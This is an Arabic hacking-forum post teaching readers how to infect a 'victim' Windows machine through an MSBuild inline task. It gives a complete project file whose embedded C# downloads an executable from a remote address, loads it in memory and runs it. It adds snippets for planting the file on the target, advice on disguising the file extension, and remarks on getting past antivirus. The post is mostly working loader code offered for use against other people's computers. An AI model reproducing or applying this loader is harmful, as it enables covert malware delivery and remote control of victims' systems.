23.04.2017 inject your Server in MSBuild


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,533
2,886
1
حياكم الله ياشباب
نزل SubTee من شهور استغلال csproject وتشغيله كـMsbuild
طيب اللي جرب بيعرف الكلام اللي رح اقوله الان
انت لازم يكون عندك فيجوال ستديو وتشغل السي شارب بروجيكت وتعمل بيلد لحتى يتم عمل السيرفر
يعني مافي ملف ناتج مجرد خدعة عالطاير بشكلها اللي طرحت فيه مارح تفيدك
ShellCodeInjector_MsBuild/shellCodeTest_msbuild.csproj at master · subTee/ShellCodeInjector_MsBuild · GitHub
او روابط اخرى من حسابه مابتفرق كلها نفس الفكرة
او من هنا عن طريق 3gstudent
GitHub - 3gstudent/msbuild-inline-task
كل المطروح يدور حول نفس الامر
قبل مانبدأ
رح تحتاج نت فريم وورك 4 بجهاز الضحية
ان ماتحب الامر هذا اترك الموضوع
فكرتي طيب ليش مانمرر لمسار الـMsbuild مسار الـ csproj
او حتى ليش مانغير الامتداد الخاص بالملف لاي شي براسك
txt,dat ....etc
هل هذا متاح .؟..نعم لافرق مهما كان الامتداد على كيفك
طيب ممكن شرح اكثر .؟ بالتاكيد رح اشرح من الصفر
مثلا اخرج سيرفرك من المشروع التالي

C#:
string s = "";
            byte[] b = Convert.FromBase64String(s);
            Assembly a = Assembly.Load(b);
            MethodInfo method = a.EntryPoint;
            method.Invoke(null, null);
ارفعه برابط مباشر
ومن ثم ضع هذا الكود في ملف txt وخله تكست او حوله للي تريده ماتفرق مثلا dat

C#:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="HacK-BacKTracK">
    <hbt />
      </Target>
  <UsingTask
    TaskName="hbt"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>
      <Using Namespace="System" />
     <Using Namespace="System.Reflection" />
     <Using Namespace=" System.Net" />
 
      <Code Type="Fragment" Language="cs">
        <![CDATA[
               WebClient wc = new WebClient();
                Byte[] b = wc.DownloadData("http://192.168.56.1/hbt.exe");
                Assembly a = Assembly.Load(b);
                MethodInfo method = a.EntryPoint;
                object o = a.CreateInstance(method.Name);
                object obj = null;
                method.Invoke(o, new[] { obj });
 
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
فقط استبدال
http://192.168.56.1/hbt.exe
برابط سيرفرك المباشر
الان حتى تضع الاكواد هذه بجهاز الضحية شرحت لكم بالفديو سيناريوهات عدة
منها انك تعمل System.IO.File.WriteAllText

C#:
System.IO.File.WriteAllText(@"D:\data.dat", Properties.Resources.String1);
وبتحط الاكواد بالريسورس حسب الكود مثلا
مااحبذها سيئة مرة لان اعتقد الافاست بجيب عملية الكتابة او انت جرب وشوف
مامسؤوليتي كيف تحط الكود بجهاز الضحية لانه باختصار ماهو بموضوعنا اليوم
او انك تعمل ستريم ريدر/ رايتر مش شرط الامتداد txt اللي تريده ضعه
هنا فانكشن بتعمل ستريم ريدر من ملف ما رافعه برابط وبتكتبه بملف بالهارد

C#:
private static void Microsoft()
        {
            var req = System.Net.HttpWebRequest.CreateHttp("http://192.168.56.1/cccc.txt");
            using (var res = req.GetResponse())
            {
                using (var stream = res.GetResponseStream())
                {
                    using (var reader = new System.IO.StreamReader(stream))
                    {
                        var remoteVersion = reader.ReadToEnd().TrimEnd();
                        StreamWriter sr = new StreamWriter(@"D:\dat.dat");
                        sr.Write(remoteVersion);
                        sr.Close();
                    }
                }
            }
        }
طبعا يجب استدعاء الفانكشن بالفويد ماين
Microsoft();
او انك تعمل داونلودر عن طريق اي لغة او عن طريق الباور شيل
شرحت بالفديو كيف "شوف المرفقات"



 

المرفقات

  • أعجبني
التفاعلات: @[email protected]

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك